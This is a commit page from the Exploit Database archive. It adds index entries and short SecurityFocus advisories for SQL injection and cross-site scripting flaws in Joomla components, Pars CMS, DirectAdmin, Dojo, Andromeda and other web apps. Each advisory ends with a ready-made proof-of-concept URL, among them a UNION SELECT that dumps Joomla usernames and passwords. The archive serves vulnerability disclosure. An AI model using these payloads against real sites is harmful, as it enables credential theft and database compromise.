Updated 06_16_2014
This commit is contained in:
Offensive Security
parent
f550d4ce66
commit
6e5e5b4068
9 changed files with 79 additions and 0 deletions
|
|
@ -30408,3 +30408,11 @@ id,file,description,date,author,platform,type,port
|
|||
33756,platforms/php/webapps/33756.txt,"Joomla! 'com_seek' Component 'id' Parameter SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0
|
||||
33757,platforms/php/webapps/33757.txt,"Joomla! 'com_d-greinar' Component 'maintree' Parameter Cross-Site Scripting Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0
|
||||
33758,platforms/asp/webapps/33758.txt,"Zigurrat Farsi CMS 'manager/textbox.asp' SQL Injection Vulnerability",2010-03-15,Isfahan,asp,webapps,0
|
||||
33759,platforms/multiple/webapps/33759.txt,"DirectAdmin <= 1.33.6 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability",2010-03-14,r0t,multiple,webapps,0
|
||||
33760,platforms/multiple/webapps/33760.txt,"Multiple Products 'banner.swf' Cross-Site Scripting Vulnerability",2010-03-15,MustLive,multiple,webapps,0
|
||||
33761,platforms/asp/webapps/33761.txt,"Pars CMS 'RP' Parameter Multiple SQL Injection Vulnerabilities",2010-03-15,Isfahan,asp,webapps,0
|
||||
33762,platforms/php/webapps/33762.txt,"Andromeda 1.9.2 's' Parameter Cross Site Scripting and Session Fixation Vulnerabilities",2010-03-15,indoushka,php,webapps,0
|
||||
33763,platforms/php/webapps/33763.txt,"Domain Verkaus & Auktions Portal 'index.php' SQL Injection Vulnerability",2010-03-15,"Easy Laster",php,webapps,0
|
||||
33764,platforms/multiple/webapps/33764.txt,"Dojo Toolkit <= 1.4.1 dijit\tests\_testCommon.js theme Parameter XSS",2010-03-15,"Adam Bixby",multiple,webapps,0
|
||||
33765,platforms/multiple/webapps/33765.txt,"Dojo Toolkit <= 1.4.1 doh\runner.html Multiple Parameter XSS",2010-03-15,"Adam Bixby",multiple,webapps,0
|
||||
33766,platforms/php/webapps/33766.txt,"Joomla! 'com_as' Component 'catid' Parameter SQL Injection Vulnerability",2010-03-16,N2n-Hacker,php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
7
platforms/asp/webapps/33761.txt
Executable file
7
platforms/asp/webapps/33761.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/38734/info
|
||||
|
||||
Pars CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/fa_default.asp?RP=' UNION SELECT TOP 3 AttrName FROM validTableName%00
|
||||
9
platforms/multiple/webapps/33759.txt
Executable file
9
platforms/multiple/webapps/33759.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/38721/info
|
||||
|
||||
DirectAdmin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
DirectAdmin 1.351 and prior versions are affected.
|
||||
|
||||
http://www.example.com:2222/CMD_DB_VIEW?DOMAIN=example.com&name=%22%3E%3Cscript%3Ealert%28111%29;%3C/script%3E
|
||||
13
platforms/multiple/webapps/33760.txt
Executable file
13
platforms/multiple/webapps/33760.txt
Executable file
|
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/38732/info
|
||||
|
||||
Multiple products are prone to a cross-site scripting vulnerability because the applications fail to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
The following products are affected:
|
||||
|
||||
phpAdsNew
|
||||
OpenAds
|
||||
OpenX
|
||||
|
||||
http://www.example.com/path/banner.swf?clickTAG=javascript:alert('XSS')
|
||||
9
platforms/multiple/webapps/33764.txt
Executable file
9
platforms/multiple/webapps/33764.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/38739/info
|
||||
|
||||
Dojo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Versions prior to Dojo 1.4.2 are vulnerable.
|
||||
|
||||
http://www.example.com/dijit/tests/form/test_Button.html?theme="/><script>alert(/xss/)</script>
|
||||
9
platforms/multiple/webapps/33765.txt
Executable file
9
platforms/multiple/webapps/33765.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/38739/info
|
||||
|
||||
Dojo is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Versions prior to Dojo 1.4.2 are vulnerable.
|
||||
|
||||
http://www.example.com/util/doh/runner.html?dojoUrl='/>foo</script><'"<script>alert(/xss/)</script>
|
||||
10
platforms/php/webapps/33762.txt
Executable file
10
platforms/php/webapps/33762.txt
Executable file
|
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/38735/info
|
||||
|
||||
Andromeda is prone to a cross-site scripting vulnerability and a session-fixation vulnerability.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and gain unauthorized access to the affected application.
|
||||
|
||||
Andromeda 1.9.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
|
||||
http://www.example.com/Andromeda.v1.9.2-/index.php?q=s&sm=fo&s=<img+src=http://www.example.com/1.JPG+onload=alert(00213771818860)>
|
||||
7
platforms/php/webapps/33763.txt
Executable file
7
platforms/php/webapps/33763.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/38737/info
|
||||
|
||||
Domain Verkaus & Auktions Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/portal/index.php?a=d&id=[SQLi]
|
||||
7
platforms/php/webapps/33766.txt
Executable file
7
platforms/php/webapps/33766.txt
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/38757/info
|
||||
|
||||
The 'com_as' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?option=com_as&as=100&catid=-20 UNION SELECT 1,2,3,concat(username,0x3a,password)...+from+jos_users--
|
||||
Loading…
Add table
Reference in a new issue